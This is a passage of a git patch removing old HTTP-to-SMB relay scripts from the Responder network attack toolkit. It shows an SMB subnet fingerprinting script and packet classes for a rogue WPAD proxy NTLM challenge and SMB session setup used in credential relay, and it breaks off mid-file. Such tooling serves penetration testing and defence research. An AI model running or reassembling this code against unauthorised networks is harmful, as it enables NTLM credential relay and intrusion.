From 57c7e3c69116469fff447b46c86c69536b58ca00 Mon Sep 17 00:00:00 2001
From: lgandx <laurent.gaffie@gmail.com>
Date: Wed, 12 Oct 2016 13:18:49 -0300
Subject: [PATCH] Removing old Relay scripts

---
 tools/RelayHTTPSMB/Finger.py          | 225 ------
 tools/RelayHTTPSMB/HTTPRelayPacket.py | 990 --------------------------
 tools/RelayHTTPSMB/HTTPToSMBRelay.py  | 387 ----------
 tools/RelayHTTPSMB/odict.py           | 117 ---
 4 files changed, 1719 deletions(-)
 delete mode 100755 tools/RelayHTTPSMB/Finger.py
 delete mode 100644 tools/RelayHTTPSMB/HTTPRelayPacket.py
 delete mode 100755 tools/RelayHTTPSMB/HTTPToSMBRelay.py
 delete mode 100644 tools/RelayHTTPSMB/odict.py

diff --git a/tools/RelayHTTPSMB/Finger.py b/tools/RelayHTTPSMB/Finger.py
deleted file mode 100755
index 39a8879..0000000
--- a/tools/RelayHTTPSMB/Finger.py
+++ /dev/null
@@ -1,225 +0,0 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import re,sys,socket,struct
-from socket import *
-from odict import OrderedDict
-
-__version__ = "0.3"
-Timeout = 0.5
-class Packet():
-    fields = OrderedDict([
-    ])
-    def __init__(self, **kw):
-        self.fields = OrderedDict(self.__class__.fields)
-        for k,v in kw.items():
-            if callable(v):
-                self.fields[k] = v(self.fields[k])
-            else:
-                self.fields[k] = v
-    def __str__(self):
-        return "".join(map(str, self.fields.values()))
-
-def longueur(payload):
-    length = struct.pack(">i", len(''.join(payload)))
-    return length
-
-class SMBHeader(Packet):
-    fields = OrderedDict([
-        ("proto",      "\xff\x53\x4d\x42"),
-        ("cmd",        "\x72"),
-        ("error-code", "\x00\x00\x00\x00" ),
-        ("flag1",      "\x00"),
-        ("flag2",      "\x00\x00"),
-        ("pidhigh",    "\x00\x00"),
-        ("signature",  "\x00\x00\x00\x00\x00\x00\x00\x00"),
-        ("reserved",   "\x00\x00"),
-        ("tid",        "\x00\x00"),
-        ("pid",        "\x00\x00"),
-        ("uid",        "\x00\x00"),
-        ("mid",        "\x00\x00"),
-    ])
-
-class SMBNego(Packet):
-    fields = OrderedDict([
-        ("Wordcount", "\x00"),
-        ("Bcc", "\x62\x00"),
-        ("Data", "")
-    ])
-    
-    def calculate(self):
-        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
-
-class SMBNegoData(Packet):
-    fields = OrderedDict([
-        ("BuffType","\x02"),
-        ("Dialect", "NT LM 0.12\x00"),
-    ])
-
-
-class SMBSessionFingerData(Packet):
-    fields = OrderedDict([
-        ("wordcount", "\x0c"),
-        ("AndXCommand", "\xff"),
-        ("reserved","\x00" ),
-        ("andxoffset", "\x00\x00"),
-        ("maxbuff","\x04\x11"),
-        ("maxmpx", "\x32\x00"),
-        ("vcnum","\x00\x00"),
-        ("sessionkey", "\x00\x00\x00\x00"),
-        ("securitybloblength","\x4a\x00"),
-        ("reserved2","\x00\x00\x00\x00"),
-        ("capabilities", "\xd4\x00\x00\xa0"),
-        ("bcc1",""),
-        ("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
-
-    ])
-    def calculate(self):
-        self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
-
-##Now Lanman
-class SMBHeaderLanMan(Packet):
-    fields = OrderedDict([
-        ("proto", "\xff\x53\x4d\x42"),
-        ("cmd", "\x72"),
-        ("error-code", "\x00\x00\x00\x00" ),
-        ("flag1", "\x08"),
-        ("flag2", "\x01\xc8"),
-        ("pidhigh", "\x00\x00"),
-        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
-        ("reserved", "\x00\x00"),
-        ("tid", "\x00\x00"),
-        ("pid", "\x3c\x1b"),
-        ("uid", "\x00\x00"),
-        ("mid", "\x00\x00"),
-    ])
-
-class SMBNegoDataLanMan(Packet):
-    fields = OrderedDict([
-        ("Wordcount", "\x00"),
-        ("Bcc", "\x54\x00"),
-        ("BuffType","\x02"),
-        ("Dialect", "NT LM 0.12\x00"),
-
-    ])
-    def calculate(self):
-        CalculateBCC = str(self.fields["BuffType"])+str(self.fields["Dialect"])
-        self.fields["Bcc"] = struct.pack("<h",len(CalculateBCC))
-
-#####################
-
-def atod(a): 
-    return struct.unpack("!L",inet_aton(a))[0]
-
-def dtoa(d): 
-    return inet_ntoa(struct.pack("!L", d))
-
-def OsNameClientVersion(data):
-	try:
-		length = struct.unpack('<H',data[43:45])[0]
-		OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
-		return OsVersion, ClientVersion
-
-	except:
-	 	return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
-
-def GetHostnameAndDomainName(data):
-	try:
-		DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
-		return Hostname, DomainJoined
-	except:
-	 	return "Could not get Hostname.", "Could not get Domain joined"
-
-def DomainGrab(Host):
-    s = socket(AF_INET, SOCK_STREAM)
-    try:
-       s.settimeout(Timeout)
-       s.connect(Host)
-    except:
-       print "Host down or port close, skipping"
-       pass
-    try:
-       h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
-       n = SMBNegoDataLanMan()
-       n.calculate()
-       packet0 = str(h)+str(n)
-       buffer0 = longueur(packet0)+packet0
-       s.send(buffer0)
-       data = s.recv(2048)
-       if data[8:10] == "\x72\x00":
-          return GetHostnameAndDomainName(data)
-    except:
-       pass 
-
-def SmbFinger(Host):
-    s = socket(AF_INET, SOCK_STREAM)
-    try:
-       s.settimeout(Timeout)
-       s.connect(Host)
-    except:
-       print "Host down or port close, skipping"
-       pass
-    try:     
-       h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
-       n = SMBNego(Data = SMBNegoData())
-       n.calculate()
-       packet0 = str(h)+str(n)
-       buffer0 = longueur(packet0)+packet0
-       s.send(buffer0)
-       data = s.recv(2048)
-       if data[8:10] == "\x72\x00":
-          head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
-          t = SMBSessionFingerData()
-          t.calculate() 
-          packet0 = str(head)+str(t)
-          buffer1 = longueur(packet0)+packet0  
-          s.send(buffer1) 
-          data = s.recv(2048)
-       if data[8:10] == "\x73\x16":
-          return OsNameClientVersion(data)
-    except:
-       pass
-##################
-#run it
-def ShowResults(Host):
-    s = socket(AF_INET, SOCK_STREAM)
-    try:
-       s.settimeout(Timeout)
-       s.connect(Host)
-    except:
-       raise
-       return False
-
-    try:
-       print "Retrieving information for %s..."%Host[0]
-       OsVer, LanManClient = SmbFinger(Host)
-       print "Os version: '%s'\nLanman Client: '%s'"%(OsVer, LanManClient)
-       Hostname, DomainJoined = DomainGrab(Host)
-       print "Machine Hostname: '%s'\nThis machine is part of the '%s' domain\n"%(Hostname, DomainJoined)
-    except:
-       pass
-
-def RunFinger(Host):
-    m = re.search("/", str(Host))
-    if m :
-       net,_,mask = Host.partition('/')
-       mask = int(mask)
-       net = atod(net)
-       for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
-           ShowResults((host,445))
-    else:
-       ShowResults((Host,445))   
-
diff --git a/tools/RelayHTTPSMB/HTTPRelayPacket.py b/tools/RelayHTTPSMB/HTTPRelayPacket.py
deleted file mode 100644
index ddd8193..0000000
--- a/tools/RelayHTTPSMB/HTTPRelayPacket.py
+++ /dev/null
@@ -1,990 +0,0 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import struct
-import sys
-import random
-import time
-from odict import OrderedDict
-import datetime
-from base64 import b64decode, b64encode
-
-def longueur(payload):
-    length = struct.pack(">i", len(''.join(payload)))
-    return length
-
-class Packet():
-    fields = OrderedDict([
-        ("data", ""),
-    ])
-    def __init__(self, **kw):
-        self.fields = OrderedDict(self.__class__.fields)
-        for k,v in kw.items():
-            if callable(v):
-                self.fields[k] = v(self.fields[k])
-            else:
-                self.fields[k] = v
-    def __str__(self):
-        return "".join(map(str, self.fields.values()))
-
-##################HTTP Proxy Relay##########################
-def HTTPCurrentDate():
-    Date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
-    return Date
-
-class WPAD_Auth_407_Ans(Packet):
-	fields = OrderedDict([
-		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
-		("Type",          "Content-Type: text/html\r\n"),
-		("WWW-Auth",      "Proxy-Authenticate: NTLM\r\n"),
-		("Connection",    "Proxy-Connection: close\r\n"),
-		("Cache-Control",    "Cache-Control: no-cache\r\n"),
-		("Pragma",        "Pragma: no-cache\r\n"),
-		("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"),
-		("Len",           "Content-Length: 0\r\n"),
-		("CRLF",          "\r\n"),
-	])
-
-
-class WPAD_NTLM_Challenge_Ans(Packet):
-	fields = OrderedDict([
-		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
-		("Type",          "Content-Type: text/html\r\n"),
-		("WWWAuth",       "Proxy-Authenticate: NTLM "),
-		("Payload",       ""),
-		("Payload-CRLF",  "\r\n"),
-		("Len",           "Content-Length: 0\r\n"),
-		("CRLF",          "\r\n"),
-	])
-
-	def calculate(self,payload):
-		self.fields["Payload"] = b64encode(payload)
-
-##################SMB Relay Packet##########################
-class SMBHeader(Packet):
-    fields = OrderedDict([
-        ("proto", "\xff\x53\x4d\x42"),
-        ("cmd", "\x72"),
-        ("error-code", "\x00\x00\x00\x00" ),
-        ("flag1", "\x08"),
-        ("flag2", "\x01\xc8"),
-        ("pidhigh", "\x00\x00"),
-        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
-        ("Reserved", "\x00\x00"),
-        ("tid", "\x00\x00"),
-        ("pid", "\x3c\x1b"),
-        ("uid", "\x00\x00"),
-        ("mid", "\x00\x00"),
-    ])
-
-class SMBNegoCairo(Packet):
-    fields = OrderedDict([
-        ("Wordcount", "\x00"),
-        ("Bcc", "\x62\x00"),
-        ("Data", "")
-    ])
-    
-    def calculate(self):
-        self.fields["Bcc"] = struct.pack("<H",len(str(self.fields["Data"])))
-
-class SMBNegoCairoData(Packet):
-    fields = OrderedDict([
-        ("Separator1","\x02" ),
-        ("Dialect1", "Cairo 0.xa\x00"), #Let's talk Cairo!
-    ])
-
-class SMBSessionSetupAndxNEGO(Packet):
-    fields = OrderedDict([
-        ("Wordcount", "\x0c"),
-        ("AndXCommand", "\xff"),
-        ("Reserved","\x00" ),
-        ("AndXOffset", "\xec\x00"),              
-        ("MaxBuff","\xff\xff"),
-        ("MaxMPX", "\x32\x00"),
-        ("VCNumber","\x00\x00"),
-        ("SessionKey", "\x00\x00\x00\x00"),
-        ("SecBlobLen","\x4a\x00"),
-        ("Reserved2","\x00\x00\x00\x00"),
-        ("Capabilities", "\xfc\xe3\x01\x80"), 
-        ("Bcc","\xb1\x00"),
-        ##gss api starts here.
-        ("ApplicationHeaderTag","\x60"),
-        ("ApplicationHeaderLen","\x48"),
-        ("AsnSecMechType","\x06"),
-        ("AsnSecMechLen","\x06"),
-        ("AsnSecMechStr","\x2b\x06\x01\x05\x05\x02"),
-        ("ChoosedTag","\xa0"),
-        ("ChoosedTagStrLen","\x3e"),
-        ("NegTokenInitSeqHeadTag","\x30"),
-        ("NegTokenInitSeqHeadLen","\x3c"),
-        ("NegTokenInitSeqHeadTag1","\xA0"),
-        ("NegTokenInitSeqHeadLen1","\x0e"),
-        ("NegTokenInitSeqNLMPTag","\x30"),
-        ("NegTokenInitSeqNLMPLen","\x0c"),
-        ("NegTokenInitSeqNLMPTag1","\x06"),
-        ("NegTokenInitSeqNLMPTag1Len","\x0a"),
-        ("NegTokenInitSeqNLMPTag1Str","\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
-        ("NegTokenInitSeqNLMPTag2","\xa2"),
-        ("NegTokenInitSeqNLMPTag2Len","\x2a"),
-        ("NegTokenInitSeqNLMPTag2Octet","\x04"),
-        ("NegTokenInitSeqNLMPTag2OctetLen","\x28"),
-        ## NTLM packet ##
-        ("Data",                           ""),
-        ## NTLM packet ##
-        ("NegTokenInitSeqMechMessageVersionTerminator","\x00"),
-        ("NativeOs","Windows 2002 Service Pack 3 2600"),
-        ("NativeOsTerminator","\x00\x00"),
-        ("NativeLan","Windows 2002 5.1"),
-        ("NativeLanTerminator","\x00\x00\x00\x00"),
-
-    ])
-    def calculate(self): 
-
-        self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
-        self.fields["NativeLan"] = self.fields["NativeLan"].encode('utf-16le')
-
-        CompleteSMBPacketLen = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["AndXOffset"])+str(self.fields["MaxBuff"])+str(self.fields["MaxMPX"])+str(self.fields["VCNumber"])+str(self.fields["SessionKey"])+str(self.fields["SecBlobLen"])+str(self.fields["Reserved2"])+str(self.fields["Capabilities"])+str(self.fields["Bcc"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
-
-
-        SecBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
-
-
-        data3 = str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
-
-        data4 = str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
-
-        data5 = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
-
-        data6 = str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
-
-        data10 = str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
-       
-        data11 = str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
-
-
-        ## Packet len
-        self.fields["AndXOffset"] = struct.pack("<h", len(CompleteSMBPacketLen)+32)
-        ##Buff Len
-        self.fields["SecBlobLen"] = struct.pack("<h", len(SecBlobLen))
-        ##Complete Buff Len
-        self.fields["Bcc"] = struct.pack("<h", len(CompleteSMBPacketLen)-27)#session setup struct is 27.
-        ##App Header
-        self.fields["ApplicationHeaderLen"] = struct.pack("<B", len(SecBlobLen)-2)
-        ##Asn Field 1
-        self.fields["AsnSecMechLen"] = struct.pack("<B", len(str(self.fields["AsnSecMechStr"])))
-        ##Asn Field 1
-        self.fields["ChoosedTagStrLen"] = struct.pack("<B", len(data3))
-        ##SpNegoTokenLen
-        self.fields["NegTokenInitSeqHeadLen"] = struct.pack("<B", len(data4))
-        ##NegoTokenInit
-        self.fields["NegTokenInitSeqHeadLen1"] = struct.pack("<B", len(data10)) 
-        ## Tag0 Len
-        self.fields["NegTokenInitSeqNLMPLen"] = struct.pack("<B", len(data11))
-        ## Tag0 Str Len
-        self.fields["NegTokenInitSeqNLMPTag1Len"] = struct.pack("<B", len(str(self.fields["NegTokenInitSeqNLMPTag1Str"])))
-        ## Tag2 Len
-        self.fields["NegTokenInitSeqNLMPTag2Len"] = struct.pack("<B", len(data6))
-        ## Tag3 Len
-        self.fields["NegTokenInitSeqNLMPTag2OctetLen"] = struct.pack("<B", len(str(self.fields["Data"])))
-
-
-class SMBSessionSetupAndxAUTH(Packet):
-    fields = OrderedDict([
-        ("wordcount", "\x0c"),
-        ("AndXCommand", "\xff"),
-        ("reserved","\x00" ),
-        ("andxoffset", "\xfa\x00"),
-        ("maxbuff","\xff\xff"),
-        ("maxmpx", "\x32\x00"),
-        ("vcnum","\x01\x00"),
-        ("sessionkey", "\x00\x00\x00\x00"),
-        ("securitybloblength","\x59\x00"),
-        ("reserved2","\x00\x00\x00\x00"),
-        ("capabilities", "\xfc\xe3\x01\x80"),
-        ("bcc1","\xbf\x00"), 
-        ("ApplicationHeaderTag","\xa1"),
-        ("ApplicationHeaderTagLenOfLen","\x81"),
-        ("ApplicationHeaderLen","\xd1"),
-        ("AsnSecMechType","\x30"),
-        ("AsnSecMechLenOfLen","\x81"),
-        ("AsnSecMechLen","\xce"),
-        ("ChoosedTag","\xa2"),
-        ("ChoosedTagLenOfLen","\x81"),
-        ("ChoosedTagLen","\xcb"),
-        ("ChoosedTag1","\x04"),
-        ("ChoosedTag1StrLenOfLen","\x81"),
-        ("ChoosedTag1StrLen","\xc8"),
-        #### NTLM Packet ####
-        ("Data",  ""),
-        #### End Of SMB ####
-        ("NLMPAuthMsgNull","\x00"),
-        ("NativeOs","Unix"),
-        ("NativeOsTerminator","\x00\x00"),
-        ("ExtraNull",""),
-        ("NativeLan","Samba"),
-        ("NativeLanTerminator","\x00\x00"),
-        ("AndxPadding",""),
-        ])
-
-
-    def calculate(self): 
-        self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
-        self.fields["NativeLan"] = self.fields["NativeLan"].encode('utf-16le')
-
-        SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
-
-        NTLMData = str(self.fields["Data"])
-	###### ASN Stuff
-        if len(NTLMData) > 255:
-	   self.fields["ApplicationHeaderTagLenOfLen"] = "\x82"
-	   self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0)
-        else:
-           self.fields["ApplicationHeaderTagLenOfLen"] = "\x81"
-	   self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3)
-
-        if len(NTLMData)-8 > 255:
-           self.fields["AsnSecMechLenOfLen"] = "\x82"
-	   self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4)
-        else:
-           self.fields["AsnSecMechLenOfLen"] = "\x81"
-	   self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6)
-
-        if len(NTLMData)-12 > 255:
-           self.fields["ChoosedTagLenOfLen"] = "\x82"
-           self.fields["ChoosedTagLen"] = struct.pack(">H", len(SecurityBlobLen)-8) 
-        else:
-           self.fields["ChoosedTagLenOfLen"] = "\x81"
-           self.fields["ChoosedTagLen"] = struct.pack(">B", len(SecurityBlobLen)-9)
-
-        if len(NTLMData)-16 > 255:
-           self.fields["ChoosedTag1StrLenOfLen"] = "\x82"
-           self.fields["ChoosedTag1StrLen"] = struct.pack(">H", len(SecurityBlobLen)-12)
-        else:
-           self.fields["ChoosedTag1StrLenOfLen"] = "\x81"
-           self.fields["ChoosedTag1StrLen"] = struct.pack(">B", len(SecurityBlobLen)-12)
-
-        CompletePacketLen = str(self.fields["wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["reserved"])+str(self.fields["andxoffset"])+str(self.fields["maxbuff"])+str(self.fields["maxmpx"])+str(self.fields["vcnum"])+str(self.fields["sessionkey"])+str(self.fields["securitybloblength"])+str(self.fields["reserved2"])+str(self.fields["capabilities"])+str(self.fields["bcc1"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])+str(self.fields["NLMPAuthMsgNull"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["ExtraNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
-
-        SecurityBlobLenUpdated = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
-
-        ## Packet len
-        self.fields["andxoffset"] = struct.pack("<h", len(CompletePacketLen)+32) #SMB1 Header is always 32
-        ##Buff Len
-        self.fields["securitybloblength"] = struct.pack("<h", len(SecurityBlobLenUpdated))
-        ##Complete Buff Len
-        self.fields["bcc1"] = struct.pack("<h", len(CompletePacketLen)-27) #SessionSetup struct is 27.
-
-class SMBTreeConnectData(Packet):
-    fields = OrderedDict([
-        ("Wordcount", "\x04"),
-        ("AndXCommand", "\xff"),
-        ("Reserved","\x00" ),
-        ("Andxoffset", "\x5a\x00"), 
-        ("Flags","\x08\x00"),
-        ("PasswdLen", "\x01\x00"),
-        ("Bcc","\x2f\x00"),
-        ("Passwd", "\x00"),
-        ("Path","\\\\IPC$"),
-        ("PathTerminator","\x00\x00"),
-        ("Service","?????"),
-        ("Terminator", "\x00"),
-
-    ])
-    def calculate(self): 
-         
-        ##Convert Path to Unicode first before any Len calc.
-        self.fields["Path"] = self.fields["Path"].encode('utf-16le')
-
-        ##Passwd Len
-        self.fields["PasswdLen"] = struct.pack("<i", len(str(self.fields["Passwd"])))[:2]
-
-        ##Packet len
-        CompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Flags"])+str(self.fields["PasswdLen"])+str(self.fields["Bcc"])+str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
-
-        self.fields["Andxoffset"] = struct.pack("<i", len(CompletePacket)+32)[:2]
-
-        ##Bcc Buff Len
-        BccComplete    = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
-        self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
-
-
-class SMBNTCreateData(Packet):
-    fields = OrderedDict([
-        ("Wordcount",     "\x18"),
-        ("AndXCommand",   "\xff"),
-        ("Reserved",      "\x00" ),
-        ("Andxoffset",    "\x00\x00"),
-        ("Reserved2",     "\x00"),
